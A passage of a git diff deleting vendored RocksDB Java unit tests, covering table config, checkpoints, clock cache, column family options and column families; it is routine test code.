-    BlockBasedTableConfig blockBasedTableConfig = new BlockBasedTableConfig();
-    blockBasedTableConfig.setCacheNumShardBits(5);
-    assertThat(blockBasedTableConfig.cacheNumShardBits()).
-        isEqualTo(5);
-  }
-
-  @Test
-  public void blockSize() {
-    BlockBasedTableConfig blockBasedTableConfig = new BlockBasedTableConfig();
-    blockBasedTableConfig.setBlockSize(10);
-    assertThat(blockBasedTableConfig.blockSize()).isEqualTo(10);
-  }
-
-
-  @Test
-  public void blockBasedTableWithFilter() {
-    try(final Options options = new Options()
-        .setTableFormatConfig(new BlockBasedTableConfig()
-        .setFilter(new BloomFilter(10)))) {
-      assertThat(options.tableFactoryName()).
-          isEqualTo("BlockBasedTable");
-    }
-  }
-
-  @Test
-  public void blockBasedTableWithoutFilter() {
-    try(final Options options = new Options().setTableFormatConfig(
-        new BlockBasedTableConfig().setFilter(null))) {
-      assertThat(options.tableFactoryName()).
-          isEqualTo("BlockBasedTable");
-    }
-  }
-
-  @Test
-  public void blockBasedTableFormatVersion() {
-    BlockBasedTableConfig config = new BlockBasedTableConfig();
-    for (int version=0; version<=2; version++) {
-      config.setFormatVersion(version);
-      assertThat(config.formatVersion()).isEqualTo(version);
-    }
-  }
-
-  @Test(expected = AssertionError.class)
-  public void blockBasedTableFormatVersionFailNegative() {
-    BlockBasedTableConfig config = new BlockBasedTableConfig();
-    config.setFormatVersion(-1);
-  }
-
-  @Test(expected = AssertionError.class)
-  public void blockBasedTableFormatVersionFailIllegalVersion() {
-    BlockBasedTableConfig config = new BlockBasedTableConfig();
-    config.setFormatVersion(3);
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/CheckPointTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/CheckPointTest.java
deleted file mode 100644
index e79569f..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/CheckPointTest.java
+++ /dev/null
@@ -1,82 +0,0 @@
-package org.rocksdb;
-
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class CheckPointTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public TemporaryFolder dbFolder = new TemporaryFolder();
-
-  @Rule
-  public TemporaryFolder checkpointFolder = new TemporaryFolder();
-
-  @Test
-  public void checkPoint() throws RocksDBException {
-    try (final Options options = new Options().
-        setCreateIfMissing(true)) {
-
-      try (final RocksDB db = RocksDB.open(options,
-          dbFolder.getRoot().getAbsolutePath())) {
-        db.put("key".getBytes(), "value".getBytes());
-        try (final Checkpoint checkpoint = Checkpoint.create(db)) {
-          checkpoint.createCheckpoint(checkpointFolder.
-              getRoot().getAbsolutePath() + "/snapshot1");
-          db.put("key2".getBytes(), "value2".getBytes());
-          checkpoint.createCheckpoint(checkpointFolder.
-              getRoot().getAbsolutePath() + "/snapshot2");
-        }
-      }
-
-      try (final RocksDB db = RocksDB.open(options,
-          checkpointFolder.getRoot().getAbsolutePath() +
-              "/snapshot1")) {
-        assertThat(new String(db.get("key".getBytes()))).
-            isEqualTo("value");
-        assertThat(db.get("key2".getBytes())).isNull();
-      }
-
-      try (final RocksDB db = RocksDB.open(options,
-          checkpointFolder.getRoot().getAbsolutePath() +
-              "/snapshot2")) {
-        assertThat(new String(db.get("key".getBytes()))).
-            isEqualTo("value");
-        assertThat(new String(db.get("key2".getBytes()))).
-            isEqualTo("value2");
-      }
-    }
-  }
-
-  @Test(expected = IllegalArgumentException.class)
-  public void failIfDbIsNull() {
-    try (final Checkpoint checkpoint = Checkpoint.create(null)) {
-
-    }
-  }
-
-  @Test(expected = IllegalStateException.class)
-  public void failIfDbNotInitialized() throws RocksDBException {
-    try (final RocksDB db = RocksDB.open(
-        dbFolder.getRoot().getAbsolutePath())) {
-      db.close();
-      Checkpoint.create(db);
-    }
-  }
-
-  @Test(expected = RocksDBException.class)
-  public void failWithIllegalPath() throws RocksDBException {
-    try (final RocksDB db = RocksDB.open(dbFolder.getRoot().getAbsolutePath());
-         final Checkpoint checkpoint = Checkpoint.create(db)) {
-      checkpoint.createCheckpoint("/Z:///:\\C:\\TZ/-");
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/ClockCacheTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/ClockCacheTest.java
deleted file mode 100644
index d1241ac..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/ClockCacheTest.java
+++ /dev/null
@@ -1,26 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.Test;
-
-public class ClockCacheTest {
-
-  static {
-    RocksDB.loadLibrary();
-  }
-
-  @Test
-  public void newClockCache() {
-    final long capacity = 1000;
-    final int numShardBits = 16;
-    final boolean strictCapacityLimit = true;
-    try(final Cache clockCache = new ClockCache(capacity,
-        numShardBits, strictCapacityLimit)) {
-      //no op
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/ColumnFamilyOptionsTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/ColumnFamilyOptionsTest.java
deleted file mode 100644
index 7574943..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/ColumnFamilyOptionsTest.java
+++ /dev/null
@@ -1,567 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Test;
-
-import java.util.ArrayList;
-import java.util.List;
-import java.util.Properties;
-import java.util.Random;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class ColumnFamilyOptionsTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  public static final Random rand = PlatformRandomHelper.
-      getPlatformSpecificRandomFactory();
-
-  @Test
-  public void getColumnFamilyOptionsFromProps() {
-    Properties properties = new Properties();
-    properties.put("write_buffer_size", "112");
-    properties.put("max_write_buffer_number", "13");
-
-    try (final ColumnFamilyOptions opt = ColumnFamilyOptions.
-        getColumnFamilyOptionsFromProps(properties)) {
-      // setup sample properties
-      assertThat(opt).isNotNull();
-      assertThat(String.valueOf(opt.writeBufferSize())).
-          isEqualTo(properties.get("write_buffer_size"));
-      assertThat(String.valueOf(opt.maxWriteBufferNumber())).
-          isEqualTo(properties.get("max_write_buffer_number"));
-    }
-  }
-
-  @Test
-  public void failColumnFamilyOptionsFromPropsWithIllegalValue() {
-    // setup sample properties
-    final Properties properties = new Properties();
-    properties.put("tomato", "1024");
-    properties.put("burger", "2");
-
-    try (final ColumnFamilyOptions opt =
-             ColumnFamilyOptions.getColumnFamilyOptionsFromProps(properties)) {
-      assertThat(opt).isNull();
-    }
-  }
-
-  @Test(expected = IllegalArgumentException.class)
-  public void failColumnFamilyOptionsFromPropsWithNullValue() {
-    try (final ColumnFamilyOptions opt =
-             ColumnFamilyOptions.getColumnFamilyOptionsFromProps(null)) {
-    }
-  }
-
-  @Test(expected = IllegalArgumentException.class)
-  public void failColumnFamilyOptionsFromPropsWithEmptyProps() {
-    try (final ColumnFamilyOptions opt =
-             ColumnFamilyOptions.getColumnFamilyOptionsFromProps(
-                 new Properties())) {
-    }
-  }
-
-  @Test
-  public void writeBufferSize() throws RocksDBException {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setWriteBufferSize(longValue);
-      assertThat(opt.writeBufferSize()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void maxWriteBufferNumber() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final int intValue = rand.nextInt();
-      opt.setMaxWriteBufferNumber(intValue);
-      assertThat(opt.maxWriteBufferNumber()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void minWriteBufferNumberToMerge() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final int intValue = rand.nextInt();
-      opt.setMinWriteBufferNumberToMerge(intValue);
-      assertThat(opt.minWriteBufferNumberToMerge()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void numLevels() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final int intValue = rand.nextInt();
-      opt.setNumLevels(intValue);
-      assertThat(opt.numLevels()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void levelZeroFileNumCompactionTrigger() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final int intValue = rand.nextInt();
-      opt.setLevelZeroFileNumCompactionTrigger(intValue);
-      assertThat(opt.levelZeroFileNumCompactionTrigger()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void levelZeroSlowdownWritesTrigger() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final int intValue = rand.nextInt();
-      opt.setLevelZeroSlowdownWritesTrigger(intValue);
-      assertThat(opt.levelZeroSlowdownWritesTrigger()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void levelZeroStopWritesTrigger() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final int intValue = rand.nextInt();
-      opt.setLevelZeroStopWritesTrigger(intValue);
-      assertThat(opt.levelZeroStopWritesTrigger()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void targetFileSizeBase() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setTargetFileSizeBase(longValue);
-      assertThat(opt.targetFileSizeBase()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void targetFileSizeMultiplier() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final int intValue = rand.nextInt();
-      opt.setTargetFileSizeMultiplier(intValue);
-      assertThat(opt.targetFileSizeMultiplier()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void maxBytesForLevelBase() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setMaxBytesForLevelBase(longValue);
-      assertThat(opt.maxBytesForLevelBase()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void levelCompactionDynamicLevelBytes() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setLevelCompactionDynamicLevelBytes(boolValue);
-      assertThat(opt.levelCompactionDynamicLevelBytes())
-          .isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void maxBytesForLevelMultiplier() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final double doubleValue = rand.nextDouble();
-      opt.setMaxBytesForLevelMultiplier(doubleValue);
-      assertThat(opt.maxBytesForLevelMultiplier()).isEqualTo(doubleValue);
-    }
-  }
-
-  @Test
-  public void maxBytesForLevelMultiplierAdditional() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final int intValue1 = rand.nextInt();
-      final int intValue2 = rand.nextInt();
-      final int[] ints = new int[]{intValue1, intValue2};
-      opt.setMaxBytesForLevelMultiplierAdditional(ints);
-      assertThat(opt.maxBytesForLevelMultiplierAdditional()).isEqualTo(ints);
-    }
-  }
-
-  @Test
-  public void maxCompactionBytes() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setMaxCompactionBytes(longValue);
-      assertThat(opt.maxCompactionBytes()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void softPendingCompactionBytesLimit() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setSoftPendingCompactionBytesLimit(longValue);
-      assertThat(opt.softPendingCompactionBytesLimit()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void hardPendingCompactionBytesLimit() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setHardPendingCompactionBytesLimit(longValue);
-      assertThat(opt.hardPendingCompactionBytesLimit()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void level0FileNumCompactionTrigger() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final int intValue = rand.nextInt();
-      opt.setLevel0FileNumCompactionTrigger(intValue);
-      assertThat(opt.level0FileNumCompactionTrigger()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void level0SlowdownWritesTrigger() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final int intValue = rand.nextInt();
-      opt.setLevel0SlowdownWritesTrigger(intValue);
-      assertThat(opt.level0SlowdownWritesTrigger()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void level0StopWritesTrigger() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final int intValue = rand.nextInt();
-      opt.setLevel0StopWritesTrigger(intValue);
-      assertThat(opt.level0StopWritesTrigger()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void arenaBlockSize() throws RocksDBException {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setArenaBlockSize(longValue);
-      assertThat(opt.arenaBlockSize()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void disableAutoCompactions() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setDisableAutoCompactions(boolValue);
-      assertThat(opt.disableAutoCompactions()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void maxSequentialSkipInIterations() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setMaxSequentialSkipInIterations(longValue);
-      assertThat(opt.maxSequentialSkipInIterations()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void inplaceUpdateSupport() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setInplaceUpdateSupport(boolValue);
-      assertThat(opt.inplaceUpdateSupport()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void inplaceUpdateNumLocks() throws RocksDBException {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setInplaceUpdateNumLocks(longValue);
-      assertThat(opt.inplaceUpdateNumLocks()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void memtablePrefixBloomSizeRatio() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final double doubleValue = rand.nextDouble();
-      opt.setMemtablePrefixBloomSizeRatio(doubleValue);
-      assertThat(opt.memtablePrefixBloomSizeRatio()).isEqualTo(doubleValue);
-    }
-  }
-
-  @Test
-  public void memtableHugePageSize() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setMemtableHugePageSize(longValue);
-      assertThat(opt.memtableHugePageSize()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void bloomLocality() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final int intValue = rand.nextInt();
-      opt.setBloomLocality(intValue);
-      assertThat(opt.bloomLocality()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void maxSuccessiveMerges() throws RocksDBException {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setMaxSuccessiveMerges(longValue);
-      assertThat(opt.maxSuccessiveMerges()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void optimizeFiltersForHits() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final boolean aBoolean = rand.nextBoolean();
-      opt.setOptimizeFiltersForHits(aBoolean);
-      assertThat(opt.optimizeFiltersForHits()).isEqualTo(aBoolean);
-    }
-  }
-
-  @Test
-  public void memTable() throws RocksDBException {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      opt.setMemTableConfig(new HashLinkedListMemTableConfig());
-      assertThat(opt.memTableFactoryName()).
-          isEqualTo("HashLinkedListRepFactory");
-    }
-  }
-
-  @Test
-  public void comparator() throws RocksDBException {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      opt.setComparator(BuiltinComparator.BYTEWISE_COMPARATOR);
-    }
-  }
-
-  @Test
-  public void linkageOfPrepMethods() {
-    try (final ColumnFamilyOptions options = new ColumnFamilyOptions()) {
-      options.optimizeUniversalStyleCompaction();
-      options.optimizeUniversalStyleCompaction(4000);
-      options.optimizeLevelStyleCompaction();
-      options.optimizeLevelStyleCompaction(3000);
-      options.optimizeForPointLookup(10);
-      options.optimizeForSmallDb();
-    }
-  }
-
-  @Test
-  public void shouldSetTestPrefixExtractor() {
-    try (final ColumnFamilyOptions options = new ColumnFamilyOptions()) {
-      options.useFixedLengthPrefixExtractor(100);
-      options.useFixedLengthPrefixExtractor(10);
-    }
-  }
-
-  @Test
-  public void shouldSetTestCappedPrefixExtractor() {
-    try (final ColumnFamilyOptions options = new ColumnFamilyOptions()) {
-      options.useCappedPrefixExtractor(100);
-      options.useCappedPrefixExtractor(10);
-    }
-  }
-
-  @Test
-  public void compressionTypes() {
-    try (final ColumnFamilyOptions columnFamilyOptions
-             = new ColumnFamilyOptions()) {
-      for (final CompressionType compressionType :
-          CompressionType.values()) {
-        columnFamilyOptions.setCompressionType(compressionType);
-        assertThat(columnFamilyOptions.compressionType()).
-            isEqualTo(compressionType);
-        assertThat(CompressionType.valueOf("NO_COMPRESSION")).
-            isEqualTo(CompressionType.NO_COMPRESSION);
-      }
-    }
-  }
-
-  @Test
-  public void compressionPerLevel() {
-    try (final ColumnFamilyOptions columnFamilyOptions
-             = new ColumnFamilyOptions()) {
-      assertThat(columnFamilyOptions.compressionPerLevel()).isEmpty();
-      List<CompressionType> compressionTypeList = new ArrayList<>();
-      for (int i = 0; i < columnFamilyOptions.numLevels(); i++) {
-        compressionTypeList.add(CompressionType.NO_COMPRESSION);
-      }
-      columnFamilyOptions.setCompressionPerLevel(compressionTypeList);
-      compressionTypeList = columnFamilyOptions.compressionPerLevel();
-      for (CompressionType compressionType : compressionTypeList) {
-        assertThat(compressionType).isEqualTo(
-            CompressionType.NO_COMPRESSION);
-      }
-    }
-  }
-
-  @Test
-  public void differentCompressionsPerLevel() {
-    try (final ColumnFamilyOptions columnFamilyOptions
-             = new ColumnFamilyOptions()) {
-      columnFamilyOptions.setNumLevels(3);
-
-      assertThat(columnFamilyOptions.compressionPerLevel()).isEmpty();
-      List<CompressionType> compressionTypeList = new ArrayList<>();
-
-      compressionTypeList.add(CompressionType.BZLIB2_COMPRESSION);
-      compressionTypeList.add(CompressionType.SNAPPY_COMPRESSION);
-      compressionTypeList.add(CompressionType.LZ4_COMPRESSION);
-
-      columnFamilyOptions.setCompressionPerLevel(compressionTypeList);
-      compressionTypeList = columnFamilyOptions.compressionPerLevel();
-
-      assertThat(compressionTypeList.size()).isEqualTo(3);
-      assertThat(compressionTypeList).
-          containsExactly(
-              CompressionType.BZLIB2_COMPRESSION,
-              CompressionType.SNAPPY_COMPRESSION,
-              CompressionType.LZ4_COMPRESSION);
-
-    }
-  }
-
-  @Test
-  public void bottommostCompressionType() {
-    try (final ColumnFamilyOptions columnFamilyOptions
-             = new ColumnFamilyOptions()) {
-      assertThat(columnFamilyOptions.bottommostCompressionType())
-          .isEqualTo(CompressionType.DISABLE_COMPRESSION_OPTION);
-
-      for (final CompressionType compressionType : CompressionType.values()) {
-        columnFamilyOptions.setBottommostCompressionType(compressionType);
-        assertThat(columnFamilyOptions.bottommostCompressionType())
-            .isEqualTo(compressionType);
-      }
-    }
-  }
-
-  @Test
-  public void compressionOptions() {
-    try (final ColumnFamilyOptions columnFamilyOptions
-             = new ColumnFamilyOptions();
-        final CompressionOptions compressionOptions = new CompressionOptions()
-          .setMaxDictBytes(123)) {
-
-      columnFamilyOptions.setCompressionOptions(compressionOptions);
-      assertThat(columnFamilyOptions.compressionOptions())
-          .isEqualTo(compressionOptions);
-      assertThat(columnFamilyOptions.compressionOptions().maxDictBytes())
-          .isEqualTo(123);
-    }
-  }
-
-  @Test
-  public void compactionStyles() {
-    try (final ColumnFamilyOptions columnFamilyOptions
-             = new ColumnFamilyOptions()) {
-      for (final CompactionStyle compactionStyle :
-          CompactionStyle.values()) {
-        columnFamilyOptions.setCompactionStyle(compactionStyle);
-        assertThat(columnFamilyOptions.compactionStyle()).
-            isEqualTo(compactionStyle);
-        assertThat(CompactionStyle.valueOf("FIFO")).
-            isEqualTo(CompactionStyle.FIFO);
-      }
-    }
-  }
-
-  @Test
-  public void maxTableFilesSizeFIFO() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      long longValue = rand.nextLong();
-      // Size has to be positive
-      longValue = (longValue < 0) ? -longValue : longValue;
-      longValue = (longValue == 0) ? longValue + 1 : longValue;
-      opt.setMaxTableFilesSizeFIFO(longValue);
-      assertThat(opt.maxTableFilesSizeFIFO()).
-          isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void maxWriteBufferNumberToMaintain() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      int intValue = rand.nextInt();
-      // Size has to be positive
-      intValue = (intValue < 0) ? -intValue : intValue;
-      intValue = (intValue == 0) ? intValue + 1 : intValue;
-      opt.setMaxWriteBufferNumberToMaintain(intValue);
-      assertThat(opt.maxWriteBufferNumberToMaintain()).
-          isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void compactionPriorities() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      for (final CompactionPriority compactionPriority :
-          CompactionPriority.values()) {
-        opt.setCompactionPriority(compactionPriority);
-        assertThat(opt.compactionPriority()).
-            isEqualTo(compactionPriority);
-      }
-    }
-  }
-
-  @Test
-  public void reportBgIoStats() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final boolean booleanValue = true;
-      opt.setReportBgIoStats(booleanValue);
-      assertThat(opt.reportBgIoStats()).
-          isEqualTo(booleanValue);
-    }
-  }
-
-  @Test
-  public void compactionOptionsUniversal() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions();
-        final CompactionOptionsUniversal optUni = new CompactionOptionsUniversal()
-          .setCompressionSizePercent(7)) {
-      opt.setCompactionOptionsUniversal(optUni);
-      assertThat(opt.compactionOptionsUniversal()).
-          isEqualTo(optUni);
-      assertThat(opt.compactionOptionsUniversal().compressionSizePercent())
-          .isEqualTo(7);
-    }
-  }
-
-  @Test
-  public void compactionOptionsFIFO() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions();
-         final CompactionOptionsFIFO optFifo = new CompactionOptionsFIFO()
-             .setMaxTableFilesSize(2000)) {
-      opt.setCompactionOptionsFIFO(optFifo);
-      assertThat(opt.compactionOptionsFIFO()).
-          isEqualTo(optFifo);
-      assertThat(opt.compactionOptionsFIFO().maxTableFilesSize())
-          .isEqualTo(2000);
-    }
-  }
-
-  @Test
-  public void forceConsistencyChecks() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final boolean booleanValue = true;
-      opt.setForceConsistencyChecks(booleanValue);
-      assertThat(opt.forceConsistencyChecks()).
-          isEqualTo(booleanValue);
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/ColumnFamilyTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/ColumnFamilyTest.java
deleted file mode 100644
index 19fe332..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/ColumnFamilyTest.java
+++ /dev/null
@@ -1,606 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.util.*;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class ColumnFamilyTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public TemporaryFolder dbFolder = new TemporaryFolder();
-
-  @Test
-  public void listColumnFamilies() throws RocksDBException {
-    try (final Options options = new Options().setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())) {
-      // Test listColumnFamilies
-      final List<byte[]> columnFamilyNames = RocksDB.listColumnFamilies(options,
-          dbFolder.getRoot().getAbsolutePath());
-      assertThat(columnFamilyNames).isNotNull();
-      assertThat(columnFamilyNames.size()).isGreaterThan(0);
-      assertThat(columnFamilyNames.size()).isEqualTo(1);
-      assertThat(new String(columnFamilyNames.get(0))).isEqualTo("default");
-    }
-  }
-
-  @Test
-  public void defaultColumnFamily() throws RocksDBException {
-    try (final Options options = new Options().setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())) {
-      final ColumnFamilyHandle cfh = db.getDefaultColumnFamily();
-      try {
-        assertThat(cfh).isNotNull();
-
-        final byte[] key = "key".getBytes();
-        final byte[] value = "value".getBytes();
-
-        db.put(cfh, key, value);
-
-        final byte[] actualValue = db.get(cfh, key);
-
-        assertThat(cfh).isNotNull();
-        assertThat(actualValue).isEqualTo(value);
-      } finally {
-        cfh.close();
-      }
-    }
-  }
-
-  @Test
-  public void createColumnFamily() throws RocksDBException {
-    try (final Options options = new Options().setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())) {
-      final ColumnFamilyHandle columnFamilyHandle = db.createColumnFamily(
-          new ColumnFamilyDescriptor("new_cf".getBytes(),
-              new ColumnFamilyOptions()));
-      try {
-        final List<byte[]> columnFamilyNames = RocksDB.listColumnFamilies(
-            options, dbFolder.getRoot().getAbsolutePath());
-        assertThat(columnFamilyNames).isNotNull();
-        assertThat(columnFamilyNames.size()).isGreaterThan(0);
-        assertThat(columnFamilyNames.size()).isEqualTo(2);
-        assertThat(new String(columnFamilyNames.get(0))).isEqualTo("default");
-        assertThat(new String(columnFamilyNames.get(1))).isEqualTo("new_cf");
-      } finally {
-        columnFamilyHandle.close();
-      }
-    }
-  }
-
-  @Test
-  public void openWithColumnFamilies() throws RocksDBException {
-    final List<ColumnFamilyDescriptor> cfNames = Arrays.asList(
-        new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY),
-        new ColumnFamilyDescriptor("new_cf".getBytes())
-    );
-
-    final List<ColumnFamilyHandle> columnFamilyHandleList =
-        new ArrayList<>();
-
-    // Test open database with column family names
-    try (final DBOptions options = new DBOptions()
-        .setCreateIfMissing(true)
-        .setCreateMissingColumnFamilies(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath(), cfNames,
-             columnFamilyHandleList)) {
-
-      try {
-        assertThat(columnFamilyHandleList.size()).isEqualTo(2);
-        db.put("dfkey1".getBytes(), "dfvalue".getBytes());
-        db.put(columnFamilyHandleList.get(0), "dfkey2".getBytes(),
-            "dfvalue".getBytes());
-        db.put(columnFamilyHandleList.get(1), "newcfkey1".getBytes(),
-            "newcfvalue".getBytes());
-
-        String retVal = new String(db.get(columnFamilyHandleList.get(1),
-            "newcfkey1".getBytes()));
-        assertThat(retVal).isEqualTo("newcfvalue");
-        assertThat((db.get(columnFamilyHandleList.get(1),
-            "dfkey1".getBytes()))).isNull();
-        db.remove(columnFamilyHandleList.get(1), "newcfkey1".getBytes());
-        assertThat((db.get(columnFamilyHandleList.get(1),
-            "newcfkey1".getBytes()))).isNull();
-        db.remove(columnFamilyHandleList.get(0), new WriteOptions(),
-            "dfkey2".getBytes());
-        assertThat(db.get(columnFamilyHandleList.get(0), new ReadOptions(),
-            "dfkey2".getBytes())).isNull();
-      } finally {
-        for (final ColumnFamilyHandle columnFamilyHandle :
-            columnFamilyHandleList) {
-          columnFamilyHandle.close();
-        }
-      }
-    }
-  }
-
-  @Test
-  public void getWithOutValueAndCf() throws RocksDBException {
-    final List<ColumnFamilyDescriptor> cfDescriptors = Arrays.asList(
-        new ColumnFamilyDescriptor(RocksDB.DEFAULT_COLUMN_FAMILY));
-    final List<ColumnFamilyHandle> columnFamilyHandleList = new ArrayList<>();
-
-    // Test open database with column family names
-    try (final DBOptions options = new DBOptions()
-        .setCreateIfMissing(true)
-        .setCreateMissingColumnFamilies(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath(), cfDescriptors,
-             columnFamilyHandleList)) {
-      try {
-        db.put(columnFamilyHandleList.get(0), new WriteOptions(),
-            "key1".getBytes(), "value".getBytes());
-        db.put("key2".getBytes(), "12345678".getBytes());
-        final byte[] outValue = new byte[5];
-        // not found value
-        int getResult = db.get("keyNotFound".getBytes(), outValue);
-        assertThat(getResult).isEqualTo(RocksDB.NOT_FOUND);
-        // found value which fits in outValue
-        getResult = db.get(columnFamilyHandleList.get(0), "key1".getBytes(),
